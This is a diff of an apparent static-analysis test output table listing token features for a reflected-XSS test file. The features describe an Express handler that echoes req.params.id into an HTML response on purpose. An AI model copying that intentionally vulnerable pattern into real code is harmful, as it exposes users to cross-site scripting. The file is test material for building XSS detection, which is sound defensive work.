contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:32 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:32 | express ... press') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:21 | require | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:21 | require | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:32 | exceptional return of require('express') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:32 | require('express') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:15:1:32 | require('express') | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:23:1:31 | 'express' | contextFunctionInterfaces | textContentType() | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:23:1:31 | 'express' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:7 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:7 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:19 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:19 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:19 | app = express() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:5:2:19 | app = express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:17 | express | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:17 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:19 | exceptional return of express() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:19 | exceptional return of express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:19 | express() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:2:11:2:19 | express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:4:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:4:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:4:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:4:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:4:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:4:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:12:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:12:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:12:2 | app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:12:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:12:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:1:12:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:5:4:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:5:4:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:5:4:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:9:4:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:9:4:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:9:4:19 | '/user/:id' | calleeImports | express | @@ -20297,6 +135343,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:9:4:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:9:4:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:9:4:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:4:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:4:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:4:21 | this | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:4:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:4:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | exceptional return of anonymous function | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | functio ... .\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | functio ... .\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | functio ... .\\n }\\n} | calleeImports | express | @@ -20304,6 +135365,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | functio ... .\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | functio ... .\\n }\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | functio ... .\\n }\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | return of anonymous function | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:22:12:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:32:4:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:4:37:4:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:5:7:5:14 | whatever | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:5:7:5:14 | whatever | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:5:7:5:14 | whatever | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:5:7:5:14 | whatever | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:5:7:5:14 | whatever | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:7 | res | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:11 | res.set | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:11 | res.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:11 | res.set | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:11 | res.set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:11 | res.set | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | exceptional return of res.set ... plain') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | exceptional return of res.set ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | exceptional return of res.set ... plain') | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | exceptional return of res.set ... plain') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | exceptional return of res.set ... plain') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | res.set ... plain') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | res.set ... plain') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | res.set ... plain') | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | res.set ... plain') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:5:6:41 | res.set ... plain') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:9:6:11 | set | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:9:6:11 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:9:6:11 | set | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:9:6:11 | set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:9:6:11 | set | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:13:6:26 | 'Content-Type' | CalleeFlexibleAccessPath | res.set | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:13:6:26 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:13:6:26 | 'Content-Type' | contextFunctionInterfaces | textContentType() | @@ -20320,6 +135436,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:29:6:40 | 'text/plain' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:29:6:40 | 'text/plain' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:6:29:6:40 | 'text/plain' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:7 | res | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:12 | res.send | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | res.sen ... ams.id) | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:5:7:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:9:7:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:9:7:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:9:7:12 | send | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:9:7:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:9:7:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:20 | "FOO: " | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20328,6 +135475,57 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:14:7:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:26 | req | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:33 | req.params | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:36 | req.params.id | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:36 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:24:7:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:28:7:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:28:7:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:28:7:33 | params | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:28:7:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:28:7:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:35:7:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:35:7:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:35:7:36 | id | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:35:7:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:7:35:7:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:7 | res | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:11 | res.set | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:11 | res.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:11 | res.set | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| 